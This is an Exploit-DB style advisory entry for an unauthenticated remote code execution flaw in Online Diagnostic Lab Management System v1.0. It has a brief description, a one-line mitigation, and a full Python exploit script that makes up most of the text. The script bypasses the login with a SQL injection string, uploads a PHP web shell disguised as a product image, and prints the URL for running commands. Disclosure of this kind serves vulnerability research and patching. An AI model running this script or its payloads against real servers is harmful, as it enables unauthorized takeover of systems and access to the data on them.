Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

vendor:

Online Diagnostic Lab Management System

by:

yousef alraddadi

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: Online Diagnostic Lab Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:online_diagnostic_lab_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 11

2022

Online Diagnostic Lab Management System v1.0 – Remote Code Execution (RCE) (Unauthenticated)

This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable system. The attacker can bypass the login page of the Online Diagnostic Lab Management System v1.0 by using a SQL injection attack. The attacker can then upload a malicious PHP file to the server, which can be used to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection

#/usr/bin/python3

import requests
import os
import sys
import time
import random

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
#                                                                                                                                            #
#    Exploit Script ( Online Diagnostic Lab Management System )                             #
#                                                                                                                                            #
##################################################################
'''
print(logo)

url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")

req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:

    print("[+] Login Successfully")
    website_1 = url+"/diagnostic/php_action/createOrder.php"

    upload_file = {
        "orderDate": (None,""),
        "clientName": (None,""),
        "clientContact" : (None,""),
        "productName[]" : (None,""),
        "rateValue[]" : (None,""),
        "quantity[]" : (None,""),
        "totalValue[]" : (None,""),
        "subTotalValue" : (None,""),
        "totalAmountValue" : (None,""),
        "discount" : (None,""),
        "grandTotalValue" : (None,""),
        "gstn" : (None,""),
        "vatValue" : (None,""),
        "paid" : (None,""),
        "dueValue" : (None,""),
        "paymentType" : (None,""),
        "paymentStatus" : (None,""),
        "paymentPlace" : (None,""),
        "productImage" : (name_file,open("rev.php","rb"))
        }

    up = req.post(website_1,files=upload_file)
    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
    print("[-] Check username or password")